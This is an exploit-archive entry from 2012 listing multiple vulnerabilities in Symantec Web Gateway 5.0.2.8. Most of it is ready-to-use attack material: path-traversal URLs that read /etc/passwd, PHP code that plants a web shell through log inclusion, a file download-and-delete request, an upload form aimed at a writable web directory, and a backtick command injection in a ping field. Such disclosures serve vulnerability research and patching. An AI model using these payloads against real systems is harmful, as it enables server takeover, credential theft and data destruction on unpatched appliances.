Skip to content
cyberexploits
webapplinuxtext

symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities

symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities

Published on 2012-06-27

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/linux/webapps/19406.txt7eac4c3a
raw
Software: Symantec Web Gateway

Current Software Version: 5.0.2.8

Product homepage: www.symantec.com

Author: S2 Crew [Hungary]

CVE: CVE-2012-0297, CVE-2012-0298, ???



File include:

        https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd



File include and OS command execution:

        http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd

        You can execute OS commands just include the error_log:

        /usr/local/apache2/logs/

        -rw-r--r--   1 root   root  5925 Nov 15 07:25 access_log

        -rw-r--r--   1 root   root  3460 Nov 15 07:21 error_log



        Make a connection to port 80:

        <?php

        $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');

        $cmd = "<?php system(\$_GET['cmd']); ?>";

        fputs($f,$cmd);

        fclose($f);

		print "Shell creation done<br>";

        ?>



Arbitary file download and delete:

        https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog

	d parameter: the complete filename 

        After the download process application removes the original file with root access! :)



        Command execution methods:

        1.Method

        Download and delete the /var/www/html/ciu/.htaccess file.

        After it you can access the ciu interface on web.

        There is an upload script: /ciu/uploadFile.php

	User can control the filename and the upload location:

        $_FILES['uploadFile'];

        $_POST['uploadLocation'];



        2.Method

        <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">

        <input type="file" name="uploadFile">

        <input type="text" name="action" value="upload">

        <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">

        <input type="hidden" name="configuration" value="test">

        <input type="submit" value="upload!">

        </form>

	

	The "/var/www/html/spywall/cleaner" is writeable by www-data.



Command execution after authentication:



        http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)



        From the modified POST message:

        Content-Disposition: form-data; name="pingaddress"

        127.0.0.1`whoami>/tmp/1234.txt`



View on GitHub